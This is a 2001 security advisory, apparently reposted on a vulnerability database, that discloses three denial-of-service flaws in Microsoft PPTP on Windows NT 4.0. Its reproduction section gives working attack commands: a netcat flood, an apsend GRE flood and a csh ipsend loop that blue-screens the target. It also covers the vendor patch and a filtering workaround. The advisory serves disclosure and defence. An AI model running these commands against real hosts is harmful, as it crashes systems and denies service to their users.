Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1313
HistoryFeb 23, 2001 - 12:00 a.m.

Denial of Service attack against computers running Microsoft PPTP (NT 4.0)

2001-02-2300:00:00
vulners.com
30

Diversified Software Industries, Inc.
http://www.dsi-inc.net/dsi
Security Advisory

February 22, 2001

Denial of Service attack against computers running Microsoft PPTP (NT 4.0)

  1. Description
  2. Steps to reproduce (exploits)
  3. Vendor status, solution, workarounds
  4. Disclaimer
  5. Credits
  6. About DSI

  1. Description

PPTP (Point-to-Point Tunneling Protocol) is a networking technology that is
used to create VPNs. The protocol uses TCP (port 1723) and GRE to perform
its work. PPTP is specified in RFC 2637 (see
http://www.ietf.org/rfc/rfc2637.txt )

This advisory presents three separate vulnerabilities. All three
vulnerabilities affect Windows NT 4.0 Workstation and Server computers
configured to accept incoming PPTP connections. The first vulnerability
involves malformed TCP packets; this vulnerability only affects certain
hardware, and only affects systems pre-SP6. The second and third
vulnerabilities involve malformed GRE packets; these affect computers with
any Service Pack.

Note that Microsoft's original bulletin did not list NT 4.0 Workstation as
vulnerable. However, if configured to accept incoming PPTP connections, NT
Workstation is vulnerable. No versions of Windows 2000 are believed
vulnerable.


  1. Steps to reproduce (exploits)

Tools needed:
Unix box (e.g., Linux, *BSD)
netcat ( http://www.l0pht.com/~weld/netcat/ or
http://www.securityfocus.com/tools/137 )
apsend ( http://www.elxsi.de/ or http://www.securityfocus.com/tools/976 )
ipsend ( http://coombs.anu.edu.au/%7Eavalon/ or
http://www.securityfocus.com/tools/129 )

Vulnerability 1: TCP Port 1723

This vulnerability only applies to machines prior to SP6. Not all machines
are affected; it appears there may be some BIOS or other issue at work here.
To reproduce, enter the following on the Unix box:

nc <ip address> 1723 < /dev/zero

If vulnerable, the target host will blue screen in a few seconds with an
error such as:
STOP 0x0A (0x0, 0x2, 0x0, 0x0)
IRQL_NOT_LESS_OR_EQUAL

Again, this vulnerability is machine-dependant; a list of tested hardware
and results can be found in the online version of this advisory at
http://www.dsi-inc.net/dsi/pptp_security_report.shtml

Vulnerability 2: GRE

This vulnerability applies to all service packs. To reproduce, on the
target machine, open task manager and select the performance tab. Also,
open a DOS window (Start: Run: cmd). On the Unix box:

apsend -d <ip address> --protocol 47 -m 0 -q

On the target host, you will see the numbers for kernel memory slowly rise
in task manager. Eventually, these numbers will stop increasing; at this
point, CPU may hit 100% for some period of time. Now try issuing a command
such as DIR at the command prompt; you'll see a message indicating the OS
isn't able to complete the command. Also, you may find the following in
your System event log:

Event ID: 2000 "The server's call to a system service failed unexpectedly."
and/or
Event ID: 2019 "The server was unable to allocate from the system nonpaged
pool because the pool was empty."

Eventually, the target host may reboot/blue screen, or it may simply remain
in an unusable state. As noted by Microsoft in their description of the
issue, a large number of packets is required. For a server with 64 MB RAM
installed, something on the order of 350,000 to 400,000 packets is needed.
Note that the effect is cumulative; e.g., an attacker could send 200,000
packets at 10 A.M. and 200,000 at 2 P.M.

Vulnerability 3: GRE

This vulnerability also applies to all service packs. To reproduce, on the
Unix box:

#!/bin/csh
foo:
ipsend -i <interface> -P gre <ip address> > /dev/null
goto foo

The target host will blue screen quickly. Approximately 50 packets are
required.


  1. Vendor status, solution, workaround

Microsoft has released a patch on February 13, 2000. Microsoft's bulletin is
available at http://www.microsoft.com/technet/security/bulletin/MS01-009.asp

As a workaround, it is possible to filter GRE by source address at your
perimeter. However, since GRE is a connectionless protocol, source address
spoofing is trivial. Thus, if an attacker can guess what source addresses
are allowed, filtering may not be effective.


  1. Disclaimer

The information in this advisory is believed to be accurate. No warranty is
given, express or implied. Neither the author nor the publisher accepts any
liability whatsoever for any use of this information, nor do we condone the
use of this information for unethical purposes.


  1. Credits

Microsoft, for their efforts to fix this problem
Chris Manjoine of the University of Iowa, for his help testing the exploits
Hobbit, Anarchy, and Darren Reed, for their useful tools


  1. About DSI

Diversified Software Industries, Inc. is an Iowa City/Coralville, Iowa-based
company that develops and markets software for the graphical representation
of data in vehicles. In addition, DSI markets custom software development
and project management skills to firms in the over-the-road transportation
marketplace. These custom solutions provide back office and on-vehicle
wireless messaging management, as well as dispatching and resource tracking
systems.

You can find more information about DSI at http://www.dsi-inc.net/dsi